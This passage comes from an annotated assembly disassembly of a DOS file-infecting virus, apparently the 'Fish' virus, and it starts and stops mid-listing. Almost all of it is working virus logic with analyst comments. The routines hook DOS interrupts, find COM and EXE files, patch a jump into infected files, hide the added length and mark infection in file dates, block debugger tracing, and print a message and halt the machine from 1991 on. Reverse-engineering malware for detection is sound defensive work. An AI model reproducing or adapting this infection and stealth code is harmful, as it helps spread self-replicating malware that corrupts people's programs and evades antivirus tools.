3411:077D 2E8B26FF0E     MOV	SP,CS:[0EFF] 
3411:0782 2E8E16010F     MOV	SS,CS:[0F01] 
3411:0787 2EFF2E030F     JMP    FAR CS:[0F03]
                        DB      'SOLE'
3411:0790 8B5C01         MOV    BX,[SI+01] 
3411:0793 8B8039F2       MOV	AX,[BX+SI+F239] 
3411:0797 8904           MOV	[SI],AX 
3411:0799 8B803BF2       MOV	AX,[BX+SI+F23B] 
3411:079D 894402         MOV	[SI+02],AX 
3411:07A0 8B803DF2       MOV	AX,[BX+SI+F23D] 
3411:07A4 894404         MOV	[SI+04],AX 
3411:07A7 E8D703         CALL   0B81            ; Print msg & halt if 1991
3411:07AA EB9B           JMP	0747 
;  INT 21, FUNCTION 4B01, Load but do not execute.
3411:07AC 3C01           CMP    AL,01           ; We only know 4B01
3411:07AE 7403           JZ	07B3 
3411:07B0 E99BFC         JMP	044E 
3411:07B3 2E830EB30E01   OR	Word Ptr CS:[0EB3],+01 
3411:07B9 2E8C06260E     MOV    CS:[0E26],ES    ; save param block segment
3411:07BE 2E891E240E     MOV    CS:[0E24],BX    ; save param block offset
3411:07C3 E8A9F9         CALL   016F            ; COD2 - restore registers
3411:07C6 E888F9         CALL   0151            ; Call DOS to load
3411:07C9 E890F9         CALL   015C            ; COD1 - save registers
3411:07CC 2EC41E240E     LES    BX,CS:[0E24]    ; restore param block
3411:07D1 26C57712       LDS	SI,ES:[BX+12] 
3411:07D5 7274           JB	084B 
3411:07D7 2E8026B30EFE   AND	Byte Ptr CS:[0EB3],FE 
3411:07DD 83FE01         CMP	SI,+01 
3411:07E0 7429           JZ	080B 
3411:07E2 8B04           MOV	AX,[SI] 
3411:07E4 034402         ADD	AX,[SI+02] 
3411:07E7 53             PUSH	BX 
3411:07E8 8B5C04         MOV	BX,[SI+04] 
3411:07EB F7D3           NOT	BX 
3411:07ED 01D8           ADD	AX,BX 
3411:07EF 5B             POP	BX 
3411:07F0 7545           JNZ	0837 
3411:07F2 8B5C01         MOV	BX,[SI+01] 
3411:07F5 8B8039F2       MOV	AX,[BX+SI+F239] 
3411:07F9 8904           MOV	[SI],AX 
3411:07FB 8B803BF2       MOV	AX,[BX+SI+F23B] 
3411:07FF 894402         MOV	[SI+02],AX 
3411:0802 8B803DF2       MOV	AX,[BX+SI+F23D] 
3411:0806 894404         MOV	[SI+04],AX 
3411:0809 EB2C           JMP    0837
3411:080B 8B161A00       MOV	DX,[001A] 
3411:080F E83202         CALL   0A44            ; MACKEREL2
3411:0812 2E8B0EA30E     MOV	CX,CS:[0EA3] 
3411:0817 83C110         ADD	CX,+10 
3411:081A 01CA           ADD	DX,CX 
3411:081C 26895714       MOV	ES:[BX+14],DX 
3411:0820 A11800         MOV	AX,[0018] 
3411:0823 26894712       MOV	ES:[BX+12],AX 
3411:0827 A11200         MOV	AX,[0012] 
3411:082A 03C1           ADD	AX,CX 
3411:082C 26894710       MOV	ES:[BX+10],AX 
3411:0830 A11400         MOV	AX,[0014] 
3411:0833 2689470E       MOV	ES:[BX+0E],AX 
3411:0837 E80A02         CALL   0A44            ; MACKEREL2
3411:083A 2E8E1EA30E     MOV	DS,CS:[0EA3] 
3411:083F 8B4602         MOV	AX,[BP+02] 
3411:0842 A30A00         MOV	[000A],AX 
3411:0845 8B4604         MOV	AX,[BP+04] 
3411:0848 A30C00         MOV	[000C],AX 
3411:084B E963FC         JMP    04B1
                         DB      'FISH'
3411:0852 E8AB04         CALL	0D00 
3411:0855 E8DC00         CALL   0934
;  EXE or COM program?
3411:0858 C606200001     MOV    Byte Ptr [0020],01      ; COM/EXE flag
3411:085D 813E000E4D5A   CMP    Word Ptr [0E00],'ZM'
3411:0863 740E           JZ	0873 
3411:0865 813E000E5A4D   CMP    Word Ptr [0E00],'MZ'
3411:086B 7406           JZ     0873
3411:086D FE0E2000       DEC	Byte Ptr [0020] 
3411:0871 7458           JZ     08CB
3411:0873 A1040E         MOV	AX,[0E04] 
3411:0876 D1E1           SHL	CX,1 
3411:0878 F7E1           MUL	CX 
3411:087A 050002         ADD	AX,0200 
3411:087D 39F0           CMP	AX,SI 
3411:087F 7248           JB     08C9
3411:0881 A10A0E         MOV	AX,[0E0A] 
3411:0884 0B060C0E       OR	AX,[0E0C] 
3411:0888 743F           JZ	08C9 
3411:088A 8B16AB0E       MOV	DX,[0EAB] 
3411:088E B90002         MOV	CX,0200 
3411:0891 A1A90E         MOV	AX,[0EA9] 
3411:0894 F7F1           DIV	CX 
3411:0896 0BD2           OR	DX,DX 
3411:0898 7401           JZ	089B 
3411:089A 40             INC	AX 
3411:089B 8916020E       MOV	[0E02],DX 
3411:089F A3040E         MOV	[0E04],AX 
3411:08A2 833E140E01     CMP	Word Ptr [0E14],+01 
3411:08A7 746D           JZ	0916 
3411:08A9 C706140E0100   MOV	Word Ptr [0E14],0001 
3411:08AF 8BC6           MOV	AX,SI 
3411:08B1 2B06080E       SUB	AX,[0E08] 
3411:08B5 A3160E         MOV	[0E16],AX 
3411:08B8 8306040E07     ADD	Word Ptr [0E04],+07 
3411:08BD C706100E000E   MOV	Word Ptr [0E10],0E00 
3411:08C3 A30E0E         MOV	[0E0E],AX 
3411:08C6 E8CD00         CALL   0996            ; PIKE1
3411:08C9 EB4B           JMP	0916 
3411:08CB 81FE000F       CMP	SI,0F00 
3411:08CF 7345           JNB	0916 
3411:08D1 A1000E         MOV	AX,[0E00] 
3411:08D4 A30400         MOV	[0004],AX 
3411:08D7 01C2           ADD	DX,AX 
3411:08D9 A1020E         MOV	AX,[0E02] 
3411:08DC A30600         MOV	[0006],AX 
3411:08DF 01C2           ADD	DX,AX 
3411:08E1 A1040E         MOV	AX,[0E04] 
3411:08E4 A30800         MOV	[0008],AX 
3411:08E7 F7D0           NOT	AX 
3411:08E9 01C2           ADD	DX,AX 
3411:08EB 7429           JZ	0916 
3411:08ED A1F20E         MOV	AX,[0EF2] 
3411:08F0 2404           AND	AL,04 
3411:08F2 7522           JNZ	0916 
;  Place JMP at beginning of newly infected file.
3411:08F4 B1E9           MOV    CL,E9           ; JMP instruction
3411:08F6 B81000         MOV	AX,0010 
3411:08F9 880E000E       MOV	[0E00],CL 
3411:08FD F7E6           MUL	SI 
3411:08FF 05CB0D         ADD	AX,0DCB 
3411:0902 A3010E         MOV    [0E01],AX       ; JMP target
3411:0905 A1000E         MOV	AX,[0E00] 
3411:0908 0306020E       ADD	AX,[0E02] 
3411:090C F7D8           NEG    AX              ; Signature of some sort
3411:090E F7D0           NOT	AX 
3411:0910 A3040E         MOV	[0E04],AX 
3411:0913 E88000         CALL   0996            ; PIKE1
3411:0916 B43E           MOV    AH,3E           ; Close file
3411:0918 E836F8         CALL	0151 
3411:091B 2E8B0EF20E     MOV	CX,CS:[0EF2] 
3411:0920 B80143         MOV    AX,4301         ; Set file attributes
3411:0923 2E8B16F40E     MOV	DX,CS:[0EF4] 
3411:0928 2E8E1EF60E     MOV	DS,CS:[0EF6] 
3411:092D E821F8         CALL	0151 
3411:0930 E84D04         CALL	0D80 
3411:0933 C3             RET
3411:0934 0E             PUSH	CS 
3411:0935 B80057         MOV	AX,5700 
3411:0938 1F             POP	DS 
3411:0939 E815F8         CALL   0151            ; Get file date+time
3411:093C 890E290E       MOV    [0E29],CX       ; File time stash
3411:0940 B80042         MOV    AX,4200         ; Move file pointer
3411:0943 89162B0E       MOV    [0E2B],DX       ; File date stash
3411:0947 33C9           XOR	CX,CX 
3411:0949 33D2           XOR	DX,DX 
3411:094B E803F8         CALL	0151 
3411:094E B43F           MOV    AH,3F           ; Read bytes
3411:0950 BA000E         MOV	DX,0E00 
3411:0953 B11C           MOV    CL,1C           ; ExeHeader size?
3411:0955 E8F9F7         CALL	0151 
3411:0958 33C9           XOR	CX,CX 
3411:095A B80042         MOV    AX,4200         ; Move file pointer
3411:095D 33D2           XOR	DX,DX 
3411:095F E8EFF7         CALL	0151 
3411:0962 B11C           MOV    CL,1C           ; ExeHeader size?
3411:0964 B43F           MOV    AH,3F           ; Read bytes
3411:0966 BA0400         MOV	DX,0004 
3411:0969 E8E5F7         CALL	0151 
3411:096C 33C9           XOR	CX,CX 
3411:096E B80242         MOV    AX,4202         ; Move file pointer from end
3411:0971 8BD1           MOV	DX,CX 
3411:0973 E8DBF7         CALL	0151 
3411:0976 8916AB0E       MOV	[0EAB],DX 
3411:097A A3A90E         MOV	[0EA9],AX 
3411:097D 8BF8           MOV	DI,AX 
3411:097F 050F00         ADD	AX,000F 
3411:0982 83D200         ADC	DX,+00 
3411:0985 25F0FF         AND	AX,FFF0 
3411:0988 29C7           SUB	DI,AX 
3411:098A B91000         MOV	CX,0010 
3411:098D F7F1           DIV	CX 
3411:098F 8BF0           MOV	SI,AX 
3411:0991 C3             RET
                        DB      'PIKE'
;  PIKE1
3411:0996 33C9           XOR    CX,CX 
3411:0998 B80042         MOV    AX,4200         ; Move file pointer
3411:099B 8BD1           MOV	DX,CX 
3411:099D E8B1F7         CALL	0151 
3411:09A0 B11C           MOV	CL,1C 
3411:09A2 B440           MOV    AH,40           ; Write to file
3411:09A4 BA000E         MOV	DX,0E00 
3411:09A7 E8A7F7         CALL	0151 
3411:09AA B81000         MOV	AX,0010 
3411:09AD F7E6           MUL	SI 
3411:09AF 8BCA           MOV	CX,DX 
3411:09B1 8BD0           MOV	DX,AX 
3411:09B3 B80042         MOV    AX,4200         ; Move file pointer
3411:09B6 E898F7         CALL	0151 
3411:09B9 B9000E         MOV	CX,0E00 
3411:09BC 33D2           XOR	DX,DX 
3411:09BE 01F9           ADD	CX,DI 
3411:09C0 B440           MOV    AH,40
3411:09C2 2EC606330E01   MOV	Byte Ptr CS:[0E33],01 
3411:09C8 53             PUSH	BX 
3411:09C9 E8DD04         CALL	0EA9 
3411:09CC 5B             POP	BX 
3411:09CD 8B0E290E       MOV    CX,[0E29]       ; File time
3411:09D1 B80157         MOV    AX,5701         ; Set file date+time
3411:09D4 8B162B0E       MOV    DX,[0E2B]       ; File date stash
3411:09D8 F6C680         TEST	DH,80 
3411:09DB 7503           JNZ	09E0 
3411:09DD 80C6C8         ADD    DH,C8           ; 100 years?
3411:09E0 E86EF7         CALL	0151 
3411:09E3 C3             RET	 
;  PIKE2
3411:09E4 E8C5F7         CALL   01AC            ; SHARK2 - save regs internal
3411:09E7 89D7           MOV	DI,DX 
3411:09E9 83C70D         ADD	DI,+0D 
3411:09EC 1E             PUSH	DS 

3411:09ED 07             POP	ES 
3411:09EE EB20           JMP    0A10
;  PIKE3  -- process filename
;  Get the drive from the filename. Then check to see if this
;  is a COM or EXE file. Returns carry clear if it is.
3411:09F0 E8B9F7         CALL   01AC            ; SHARK2 - save regs internal
3411:09F3 1E             PUSH	DS 
3411:09F4 07             POP	ES 
3411:09F5 B95000         MOV	CX,0050 
3411:09F8 89D7           MOV    DI,DX           ; Filename now @ ES:DI
3411:09FA B300           MOV    BL,00           ; Assume current drive
3411:09FC 33C0           XOR	AX,AX 
;  If drive specification is included, snag it
3411:09FE 807D013A       CMP    Byte Ptr [DI+01],':'
3411:0A02 7505           JNZ	0A09 
3411:0A04 8A1D           MOV    BL,[DI]         ; Get letter
3411:0A06 80E31F         AND    BL,1F           ; Convert to 0..FF
3411:0A09 2E881E280E     MOV    CS:[0E28],BL    ; drive code
;  Search for end of filename, AL contains a zero
3411:0A0E F2             REPNZ	
3411:0A0F AE             SCASB
;  Determine with the file extension (last 3 characters of filename).
;  This is done by converting to uppercase and adding them together.
3411:0A10 8B45FD         MOV    AX,[DI-03]      ; Last 2 chars of ext
3411:0A13 25DFDF         AND    AX,DFDF         ; uppercase
3411:0A16 02E0           ADD	AH,AL 
3411:0A18 8A45FC         MOV    AL,[DI-04]      ; First char of ext
3411:0A1B 24DF           AND    AL,DF           ; uppercase
3411:0A1D 02C4           ADD	AL,AH 
3411:0A1F 2EC606200000   MOV	Byte Ptr CS:[0020],00 
3411:0A25 3CDF           CMP    AL,'C'+'O'+'M'  ; COM file
3411:0A27 7409           JZ	0A32 
3411:0A29 2EFE062000     INC	Byte Ptr CS:[0020] 
3411:0A2E 3CE2           CMP    AL,'E'+'X'+'E'  ; EXE file
3411:0A30 750D           JNZ    0A3F            ; MACKEREL1
;  This is an executable, clear carry.
3411:0A32 E852F7         CALL   0187            ; SHARK1 - rest regs internal
3411:0A35 F8             CLC	 
3411:0A36 C3             RET
                        DB      'MACKEREL'
;  (Continued from PIKE3 above) Not an executable, set carry.
3411:0A3F E845F7         CALL   0187            ; SHARK1 - rest regs internal
3411:0A42 F9             STC	 
3411:0A43 C3             RET
3411:0A44 53             PUSH   BX
3411:0A45 B451           MOV    AH,51           ; Get PSP segment
3411:0A47 E807F7         CALL	0151 
3411:0A4A 2E891EA30E     MOV	CS:[0EA3],BX 
3411:0A4F 5B             POP	BX 
3411:0A50 C3             RET
3411:0A51 E8AC02         CALL	0D00 
3411:0A54 52             PUSH	DX 
3411:0A55 B436           MOV    AH,36           ; Get free disk space
3411:0A57 2E8A16280E     MOV    DL,CS:[0E28]    ; Drive code
3411:0A5C E8F2F6         CALL	0151 
3411:0A5F F7E1           MUL	CX 
3411:0A61 F7E3           MUL	BX 
3411:0A63 89D3           MOV	BX,DX 
3411:0A65 5A             POP	DX 
3411:0A66 0BDB           OR	BX,BX 
3411:0A68 7505           JNZ	0A6F 
3411:0A6A 3D0040         CMP	AX,4000 
3411:0A6D 7248           JB	0AB7 
3411:0A6F B80043         MOV    AX,4300         ; Get file attrs
3411:0A72 E8DCF6         CALL	0151 
3411:0A75 7240           JB	0AB7 
3411:0A77 2E8916F40E     MOV	CS:[0EF4],DX 
3411:0A7C 2E890EF20E     MOV	CS:[0EF2],CX 
3411:0A81 2E8C1EF60E     MOV	CS:[0EF6],DS 
3411:0A86 B80143         MOV    AX,4301         ; Set file attrs
3411:0A89 33C9           XOR    CX,CX           ; to nothing
3411:0A8B E8C3F6         CALL	0151 
3411:0A8E 2E803EDA0E00   CMP	Byte Ptr CS:[0EDA],00 
3411:0A94 7521           JNZ    0AB7
;  Open file, read/write access
3411:0A96 B8023D         MOV	AX,3D02 
3411:0A99 E8B5F6         CALL	0151 
3411:0A9C 7219           JB     0AB7

3411:0A9E 8BD8           MOV	BX,AX 
3411:0AA0 53             PUSH	BX 
3411:0AA1 B432           MOV    AH,32           ; Get drive param blk
3411:0AA3 2E8A16280E     MOV    DL,CS:[0E28]    ; Drive code
3411:0AA8 E8A6F6         CALL	0151 
3411:0AAB 8B471E         MOV	AX,[BX+1E] 
3411:0AAE 2EA3EC0E       MOV	CS:[0EEC],AX 
3411:0AB2 5B             POP	BX 
3411:0AB3 E8CA02         CALL	0D80 
3411:0AB6 C3             RET	 
3411:0AB7 33DB           XOR	BX,BX 
3411:0AB9 4B             DEC	BX 
3411:0ABA E8C302         CALL	0D80 
3411:0ABD C3             RET
;  If this is a character file, get its time to
;  determine if it has been infected.
3411:0ABE 51             PUSH	CX 
3411:0ABF 52             PUSH	DX 
3411:0AC0 50             PUSH	AX 
3411:0AC1 B80044         MOV    AX,4400         ; IOCTL get device info
3411:0AC4 E88AF6         CALL	0151 
3411:0AC7 80F280         XOR	DL,80 
3411:0ACA F6C280         TEST	DL,80 
3411:0ACD 7409           JZ	0AD8 
3411:0ACF B80057         MOV    AX,5700         ; Get file time+date
3411:0AD2 E87CF6         CALL	0151 
3411:0AD5 F6C680         TEST	DH,80 
3411:0AD8 58             POP	AX 
3411:0AD9 5A             POP	DX 
3411:0ADA 59             POP	CX 
3411:0ADB C3             RET
3411:0ADC E8CDF6         CALL   01AC            ; SHARK2 - save regs internal
3411:0ADF 33C9           XOR	CX,CX 
3411:0AE1 B80142         MOV    AX,4201         ; Move file pointer
3411:0AE4 33D2           XOR	DX,DX 
3411:0AE6 E868F6         CALL	0151 
3411:0AE9 2E8916A70E     MOV	CS:[0EA7],DX 
3411:0AEE 2EA3A50E       MOV	CS:[0EA5],AX 
3411:0AF2 B80242         MOV    AX,4202         ; Move file pointer
3411:0AF5 33C9           XOR	CX,CX 
3411:0AF7 33D2           XOR	DX,DX 
3411:0AF9 E855F6         CALL	0151 
3411:0AFC 2E8916AB0E     MOV	CS:[0EAB],DX 
3411:0B01 2EA3A90E       MOV	CS:[0EA9],AX 
3411:0B05 B80042         MOV    AX,4200         ; Move file pointer
3411:0B08 2E8B16A50E     MOV	DX,CS:[0EA5] 
3411:0B0D 2E8B0EA70E     MOV	CX,CS:[0EA7] 
3411:0B12 E83CF6         CALL	0151 
3411:0B15 E86FF6         CALL   0187            ; SHARK1 - rest regs internal
3411:0B18 C3             RET
                        DB      'FISH'
;  I N T 2 1 / AH = 57 -- Get / Set file time+date
3411:0B1D 0AC0           OR	AL,AL 
3411:0B1F 7522           JNZ	0B43 
3411:0B21 2E8326B30EFE   AND	Word Ptr CS:[0EB3],-02 
3411:0B27 E845F6         CALL   016F            ; COD2 - restore registers
3411:0B2A E824F6         CALL	0151 
3411:0B2D 720B           JB	0B3A 
3411:0B2F F6C680         TEST	DH,80 
3411:0B32 7403           JZ	0B37 
3411:0B34 80EEC8         SUB	DH,C8 
3411:0B37 E918F9         JMP	0452 
3411:0B3A 2E830EB30E01   OR	Word Ptr CS:[0EB3],+01 
3411:0B40 E90FF9         JMP	0452 
3411:0B43 3C01           CMP	AL,01 
3411:0B45 7537           JNZ	0B7E 
3411:0B47 2E8326B30EFE   AND	Word Ptr CS:[0EB3],-02 
3411:0B4D F6C680         TEST	DH,80 
3411:0B50 7403           JZ	0B55 
3411:0B52 80EEC8         SUB	DH,C8 
3411:0B55 E866FF         CALL   0ABE            ; Infected?
3411:0B58 7403           JZ	0B5D 
3411:0B5A 80C6C8         ADD	DH,C8 
3411:0B5D E8F1F5         CALL	0151 
3411:0B60 8946FC         MOV	[BP-04],AX 
3411:0B63 2E8316B30E00   ADC	Word Ptr CS:[0EB3],+00 
3411:0B69 E945F9         JMP    04B1
;  I N T 2 1 / AH = 42 -- Move file pointer
3411:0B6C 3C02           CMP    AL,02           ; code 2 = From end of file
3411:0B6E 750E           JNZ	0B7E 
;  If moving relative to end of file, subtract our target
3411:0B70 E84BFF         CALL   0ABE            ; Infected?
3411:0B73 7409           JZ     0B7E 
3411:0B75 816EF6000E     SUB    Word Ptr [BP-0A],0E00 
3411:0B7A 835EF800       SBB	Word Ptr [BP-08],+00 
3411:0B7E E9CDF8         JMP    044E
;  If this is 1991, print "FISH VIRUS #6" string and halt
3411:0B81 E8D8F5         CALL   015C            ; COD1 - save registers
3411:0B84 B42A           MOV    AH,2A           ; Get system date
3411:0B86 E8C8F5         CALL	0151 
3411:0B89 81F9C707       CMP    CX,07C7         ; 1991
3411:0B8D 720B           JB	0B9A 
3411:0B8F B409           MOV    AH,09           ; Output string
3411:0B91 0E             PUSH	CS 
3411:0B92 1F             POP	DS 
3411:0B93 BAAB01         MOV	DX,01AB 
3411:0B96 E8B8F5         CALL	0151 
3411:0B99 F4             HLT	 
3411:0B9A E8D2F5         CALL   016F            ; COD2 - restore registers
3411:0B9D C3             RET
;  I N T 2 1 / AH = 3F -- Read file or device
3411:0B9E 2E8026B30EFE   AND	Byte Ptr CS:[0EB3],FE 
3411:0BA4 E817FF         CALL   0ABE            ; Infected?
3411:0BA7 74D5           JZ	0B7E 
3411:0BA9 2E8916AD0E     MOV	CS:[0EAD],DX 
3411:0BAE 2E890EAF0E     MOV	CS:[0EAF],CX 
3411:0BB3 2EC706B10E0000 MOV	Word Ptr CS:[0EB1],0000 
3411:0BBA E81FFF         CALL	0ADC 
3411:0BBD 2EA1A90E       MOV	AX,CS:[0EA9] 
3411:0BC1 2E8B16AB0E     MOV	DX,CS:[0EAB] 
3411:0BC6 2D000E         SUB	AX,0E00 
3411:0BC9 83DA00         SBB	DX,+00 
3411:0BCC 2E2B06A50E     SUB	AX,CS:[0EA5] 
3411:0BD1 2E1B16A70E     SBB	DX,CS:[0EA7] 
3411:0BD6 7908           JNS	0BE0 
3411:0BD8 C746FC0000     MOV	Word Ptr [BP-04],0000 
3411:0BDD E92DFA         JMP	060D 
3411:0BE0 7508           JNZ	0BEA 
3411:0BE2 3BC1           CMP	AX,CX 
3411:0BE4 7704           JA	0BEA 
3411:0BE6 2EA3AF0E       MOV	CS:[0EAF],AX 
3411:0BEA 2E8B0EA70E     MOV	CX,CS:[0EA7] 
3411:0BEF 2E8B16A50E     MOV	DX,CS:[0EA5] 
3411:0BF4 0BC9           OR	CX,CX 
3411:0BF6 7505           JNZ	0BFD 
3411:0BF8 83FA1C         CMP	DX,+1C 
3411:0BFB 761A           JBE	0C17 
3411:0BFD 2E8B16AD0E     MOV	DX,CS:[0EAD] 
3411:0C02 B43F           MOV    AH,3F           ; Read file
3411:0C04 2E8B0EAF0E     MOV	CX,CS:[0EAF] 
3411:0C09 E845F5         CALL	0151 
3411:0C0C 2E0306B10E     ADD	AX,CS:[0EB1] 
3411:0C11 8946FC         MOV	[BP-04],AX 
3411:0C14 E99AF8         JMP	04B1 
3411:0C17 89D7           MOV	DI,DX 
3411:0C19 89D6           MOV	SI,DX 
3411:0C1B 2E033EAF0E     ADD	DI,CS:[0EAF] 
3411:0C20 83FF1C         CMP	DI,+1C 
3411:0C23 7208           JB	0C2D 
3411:0C25 33FF           XOR	DI,DI 
3411:0C27 EB09           JMP    0C32
                        DB      'TUNA'
3411:0C2D 83EF1C         SUB    DI,+1C 
3411:0C30 F7DF           NEG	DI 
3411:0C32 8BC2           MOV	AX,DX 
3411:0C34 2E8B16A90E     MOV	DX,CS:[0EA9] 
3411:0C39 2E8B0EAB0E     MOV	CX,CS:[0EAB] 
3411:0C3E 83C20F         ADD	DX,+0F 
3411:0C41 83D100         ADC	CX,+00 
3411:0C44 83E2F0         AND	DX,-10 
3411:0C47 81EAFC0D       SUB	DX,0DFC 
3411:0C4B 83D900         SBB	CX,+00 
3411:0C4E 01C2           ADD	DX,AX 
3411:0C50 83D100         ADC	CX,+00 
3411:0C53 B80042         MOV    AX,4200         ; Move file pointer
3411:0C56 E8F8F4         CALL	0151 
3411:0C59 B91C00         MOV	CX,001C 
3411:0C5C 29F9           SUB	CX,DI 
3411:0C5E 29F1           SUB	CX,SI 
3411:0C60 B43F           MOV    AH,3F           ; Read file
3411:0C62 2E8B16AD0E     MOV	DX,CS:[0EAD] 
3411:0C67 E8E7F4         CALL	0151 
3411:0C6A 2E0106AD0E     ADD	CS:[0EAD],AX 
3411:0C6F 2E2906AF0E     SUB	CS:[0EAF],AX 
3411:0C74 2E0106B10E     ADD	CS:[0EB1],AX 
3411:0C79 33C9           XOR	CX,CX 
3411:0C7B B80042         MOV    AX,4200         ; Move file pointer
3411:0C7E BA1C00         MOV	DX,001C 
3411:0C81 E8CDF4         CALL	0151 
3411:0C84 E976FF         JMP    0BFD
;  TUNA2 -- SPOOF -- Skip over byte immediately after CALL
3411:0C87 2E2126310E     AND    CS:[0E31],SP
3411:0C8C E93801         JMP    0DC7            ; SPOOF
;  TUNA3
;  I N T 2 1 / AH = 4E,4F -- Search first/next match
3411:0C8F 2E8326B30EFE   AND	Word Ptr CS:[0EB3],-02 
3411:0C95 E8D7F4         CALL   016F            ; COD2 - restore registers
3411:0C98 E8B6F4         CALL   0151
3411:0C9B E8BEF4         CALL   015C            ; COD1 - save registers
3411:0C9E 7309           JNB    0CA9            ; a match was found
3411:0CA0 2E830EB30E01   OR	Word Ptr CS:[0EB3],+01 
3411:0CA6 E908F8         JMP    04B1
;  A match was found. Subtract the virus length from
;  infected files and normalize the date.
3411:0CA9 E899F9         CALL   0645                    ; Get DTA address
3411:0CAC F6471980       TEST   Byte Ptr [BX+19],80     ; file date
3411:0CB0 7503           JNZ    0CB5                    ; infected..
3411:0CB2 E9FCF7         JMP	04B1 
3411:0CB5 816F1A000E     SUB    Word Ptr [BX+1A],0E00   ; file size
3411:0CBA 835F1C00       SBB    Word Ptr [BX+1C],+00    ; file size
3411:0CBE 806F19C8       SUB    Byte Ptr [BX+19],C8     ; normalize date
3411:0CC2 E9ECF7         JMP	04B1 
3411:0CC5 EB
;  A spoof routine
3411:0CC6 8E06450E       MOV    ES,[0E45]
3411:0CCA 06             PUSH	ES 
3411:0CCB 1F             POP	DS 
3411:0CCC FE0E0300       DEC	Byte Ptr [0003] 
3411:0CD0 8CDA           MOV	DX,DS 
3411:0CD2 4A             DEC	DX 
3411:0CD3 8EDA           MOV	DS,DX 
3411:0CD5 A10300         MOV	AX,[0003] 
3411:0CD8 FECC           DEC	AH 
3411:0CDA 01C2           ADD	DX,AX 
3411:0CDC A30300         MOV	[0003],AX 
3411:0CDF 5F             POP	DI 
3411:0CE0 42             INC	DX 
3411:0CE1 8EC2           MOV	ES,DX 
3411:0CE3 0E             PUSH	CS 
3411:0CE4 1F             POP	DS 
3411:0CE5 E8DF00         CALL   0DC7            ; SPOOF
3411:0CE8 A1
3411:0CE9 BEFE0F         MOV    SI,0FFE
3411:0CEC B90008         MOV    CX,0800
3411:0CEF 89F7           MOV	DI,SI 
3411:0CF1 FD             STD	 
3411:0CF2 F3             REPZ	
3411:0CF3 A5             MOVSW	 
3411:0CF4 FC             CLD	 
3411:0CF5 06             PUSH	ES 
3411:0CF6 B8DD01         MOV	AX,01DD 
3411:0CF9 50             PUSH	AX 
3411:0CFA 2E8E06450E     MOV	ES,CS:[0E45] 
3411:0CFF CB             RETF
;  Single step through INT13
3411:0D00 2EC606DA0E00   MOV	Byte Ptr CS:[0EDA],00 
3411:0D06 E8A3F4         CALL   01AC            ; SHARK2 - save regs internal
3411:0D09 0E             PUSH	CS 
3411:0D0A E87AFF         CALL   0C87            ; TUNA2
3411:0D0D 88                                    ; filler
3411:0D0E B013           MOV    AL,13
3411:0D10 1F             POP    DS
3411:0D11 E8FCF4         CALL   0210            ; CARP3 - get interrupt
3411:0D14 8C062F0E       MOV	[0E2F],ES 
3411:0D18 891E2D0E       MOV	[0E2D],BX 
3411:0D1C 8C063B0E       MOV	[0E3B],ES 
3411:0D20 B202           MOV	DL,02 
3411:0D22 891E390E       MOV	[0E39],BX 
3411:0D26 8816500E       MOV	[0E50],DL 
3411:0D2A E8C2F4         CALL   01EF            ; CARP1 -- single step
3411:0D2D 8926DF0E       MOV	[0EDF],SP 
3411:0D31 8C16DD0E       MOV	[0EDD],SS 
3411:0D35 0E             PUSH	CS 
3411:0D36 B8290C         MOV	AX,0C29 
3411:0D39 50             PUSH	AX 
3411:0D3A B87000         MOV	AX,0070 
3411:0D3D B9FFFF         MOV	CX,FFFF 
3411:0D40 8EC0           MOV	ES,AX 
3411:0D42 33FF           XOR	DI,DI 
3411:0D44 B0CB           MOV	AL,CB 
3411:0D46 F2             REPNZ	
3411:0D47 AE             SCASB	 
3411:0D48 4F             DEC	DI 
3411:0D49 9C             PUSHF	 
3411:0D4A 06             PUSH	ES 
3411:0D4B 57             PUSH	DI 
3411:0D4C 9C             PUSHF	 
3411:0D4D 58             POP	AX 
3411:0D4E 80CC01         OR	AH,01 
3411:0D51 50             PUSH	AX 
3411:0D52 9D             POPF	 
3411:0D53 33C0           XOR	AX,AX 
3411:0D55 FF2E2D0E       JMP    FAR [0E2D]
3411:0D59 0E             PUSH	CS 
3411:0D5A 1F             POP	DS 
3411:0D5B E86900         CALL   0DC7            ; SPOOF
3411:0D5E 8C
3411:0D5F B013BA         MOV    AL,13           ; BIOS int 13
3412:0D61 BA900D         MOV    DX,0D90
3411:0D64 E893F4         CALL   01FA
3411:0D67 B024           MOV    AL,24           ; Critical error INT24
3411:0D69 E8A4F4         CALL   0210            ; CARP3 - get interrupt
3411:0D6C 891E3D0E       MOV	[0E3D],BX 
3411:0D70 BAC50D         MOV	DX,0DC5 
3411:0D73 B024           MOV    AL,24           ; Critical error INT24
3411:0D75 8C063F0E       MOV	[0E3F],ES 
3411:0D79 E87EF4         CALL   01FA            ; CARP2 - set interrupt
3411:0D7C E808F4         CALL   0187            ; SHARK1 - rest regs internal
3411:0D7F C3             RET
3411:0D80 E829F4         CALL   01AC            ; SHARK2 - save regs internal
3411:0D83 2EC516390E     LDS	DX,CS:[0E39] 
3411:0D88 B013           MOV    AL,13           ; BIOS disk access
3411:0D8A E86DF4         CALL   01FA            ; CARP2 - set interrupt
3411:0D8D 2EC5163D0E     LDS	DX,CS:[0E3D] 
3411:0D92 B024           MOV    AL,24           ; Critical error INT24
3411:0D94 E863F4         CALL   01FA            ; CARP2 - set interrupt
3411:0D97 E8EDF3         CALL   0187            ; SHARK1 - rest regs internal
3411:0D9A C3             RET
;  I N T 0 1 H
;  Replacement SINGLE STEP interrupt, INT 01H.
;  This is the interrupt routine to prevent DEBUG from tracing.
;  During execution, the offset to here is 0CB7
3411:0D9B 55             PUSH	BP 
3411:0D9C 89E5           MOV	BP,SP 
3411:0D9E 816606FFFE     AND	Word Ptr [BP+06],FEFF 
3411:0DA3 FF461A         INC	Word Ptr [BP+1A] 
3411:0DA6 5D             POP	BP 
3411:0DA7 CF             IRET
3411:0DA8 2EC706500E0104 MOV	Word Ptr CS:[0E50],0401 
3411:0DAF E83DF4         CALL   01EF            ; CARP1 - Disable single step
3411:0DB2 E8BAF3         CALL   016F            ; COD2 - restore registers
3411:0DB5 50             PUSH	AX 
3411:0DB6 2EA1B30E       MOV	AX,CS:[0EB3] 
3411:0DBA 0D0001         OR	AX,0100 
3411:0DBD 50             PUSH	AX 
3411:0DBE 9D             POPF	 
3411:0DBF 58             POP	AX 
3411:0DC0 5D             POP	BP 
3411:0DC1 2EFF2E350E     JMP    FAR CS:[0E35]
3411:0DC6 89
;  SPOOF -- This routine skips over byte following the CALL.
3411:0DC7 E892F3         CALL   015C            ; COD1 - save registers
3411:0DCA B001           MOV    AL,01           ; Interrupt 01H
3411:0DCC BA6B0C         MOV	DX,0C6B 
3411:0DCF 0E             PUSH	CS 
